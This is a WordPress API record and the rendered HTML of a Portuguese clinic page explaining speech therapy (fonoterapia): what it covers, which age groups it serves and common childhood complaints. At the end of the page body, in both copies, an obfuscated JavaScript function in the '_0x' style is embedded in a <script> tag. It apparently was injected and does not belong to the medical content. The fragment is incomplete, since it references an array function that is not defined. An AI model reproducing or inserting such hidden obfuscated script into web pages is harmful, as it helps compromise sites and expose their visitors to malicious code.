{"id":314,"date":"2017-06-13T20:16:54","date_gmt":"2017-06-13T23:16:54","guid":{"rendered":"http:\/\/renovamaringa.com.br\/portal\/?page_id=314"},"modified":"2019-11-14T14:33:45","modified_gmt":"2019-11-14T17:33:45","slug":"fonoterapia","status":"publish","type":"page","link":"https:\/\/renovamaringa.com.br\/portal\/fonoterapia\/","title":{"rendered":"Fonoterapia"},"content":{"rendered":"<h2 class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\">O que \u00e9 a Fonoterapia?<u><\/u><u><\/u><\/h2>\n<p class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\"><u><\/u>A fonoterapia \u00e9 o aux\u00edlio de pacientes com objetivos espec\u00edficos, feito com planejamento personalizado, frequ\u00eancia e dura\u00e7\u00e3o individualizada, respeitando, sempre, as caracter\u00edsticas de cada caso.<\/p>\n<p class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\">As altera\u00e7\u00f5es de fala e linguagem n\u00e3o est\u00e3o basicamente associadas a uma defici\u00eancia particular, podendo estar presentes em crian\u00e7as, adolescentes, adultos e idosos.<u><\/u><u><\/u><\/p>\n<p class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\">A terapia fonoaudiol\u00f3gica pode ser realizada para preven\u00e7\u00e3o ou reabilita\u00e7\u00e3o dos Dist\u00farbios da Comunica\u00e7\u00e3o nos seguintes campos de atua\u00e7\u00e3o: Linguagem Oral e\/ou Escrita; Motricidade Orofacial; Voz; e Audi\u00e7\u00e3o.<u><\/u><u><\/u><\/p>\n<p class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\">As queixas mais presentes em crian\u00e7as s\u00e3o: o atraso de linguagem; a troca de sons durante a fala; ceceio anterior e lateral (l\u00edngua entre os dentes); gagueira; voz; e leitura\/escrita.<u><\/u><u><\/u><\/p>\n<p class=\"x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing\" style=\"text-align: justify;\">A fala abrange a participa\u00e7\u00e3o de v\u00e1rias fun\u00e7\u00f5es como a suc\u00e7\u00e3o; a mastiga\u00e7\u00e3o; a degluti\u00e7\u00e3o; e a respira\u00e7\u00e3o. Essas fun\u00e7\u00f5es v\u00e3o nos preparar para a comunica\u00e7\u00e3o, ou seja, todos esses fatores v\u00e3o estimular a forma de pronunciar as palavras melhorando a articula\u00e7\u00e3o.<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O que \u00e9 a Fonoterapia? A fonoterapia \u00e9 o aux\u00edlio de pacientes com objetivos espec\u00edficos, feito com planejamento personalizado, frequ\u00eancia e dura\u00e7\u00e3o individualizada, respeitando, sempre, as caracter\u00edsticas de cada caso. As altera\u00e7\u00f5es<a class=\"moretag\" href=\"https:\/\/renovamaringa.com.br\/portal\/fonoterapia\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":568,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-314","page","type-page","status-publish","has-post-thumbnail","hentry"],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/P8NC8B-54","jetpack-related-posts":[],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/314","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/comments?post=314"}],"version-history":[{"count":4,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/314\/revisions"}],"predecessor-version":[{"id":364,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/314\/revisions\/364"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media?parent=314"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<h2 class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;">O que é a Fonoterapia?<u></u><u></u></h2>
<p class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;"><u></u>A fonoterapia é o auxílio de pacientes com objetivos específicos, feito com planejamento personalizado, frequência e duração individualizada, respeitando, sempre, as características de cada caso.</p>
<p class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;">As alterações de fala e linguagem não estão basicamente associadas a uma deficiência particular, podendo estar presentes em crianças, adolescentes, adultos e idosos.<u></u><u></u></p>
<p class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;">A terapia fonoaudiológica pode ser realizada para prevenção ou reabilitação dos Distúrbios da Comunicação nos seguintes campos de atuação: Linguagem Oral e/ou Escrita; Motricidade Orofacial; Voz; e Audição.<u></u><u></u></p>
<p class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;">As queixas mais presentes em crianças são: o atraso de linguagem; a troca de sons durante a fala; ceceio anterior e lateral (língua entre os dentes); gagueira; voz; e leitura/escrita.<u></u><u></u></p>
<p class="x_m_-5663892618402563854m_-5089505555400545209MsoNoSpacing" style="text-align: justify;">A fala abrange a participação de várias funções como a sucção; a mastigação; a deglutição; e a respiração. Essas funções vão nos preparar para a comunicação, ou seja, todos esses fatores vão estimular a forma de pronunciar as palavras melhorando a articulação.</p>
<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script></p>

<p>O que é a Fonoterapia? A fonoterapia é o auxílio de pacientes com objetivos específicos, feito com planejamento personalizado, frequência e duração individualizada, respeitando, sempre, as características de cada caso. As alterações<a class="moretag" href="https://renovamaringa.com.br/portal/fonoterapia/">Read More&#8230;</a></p>
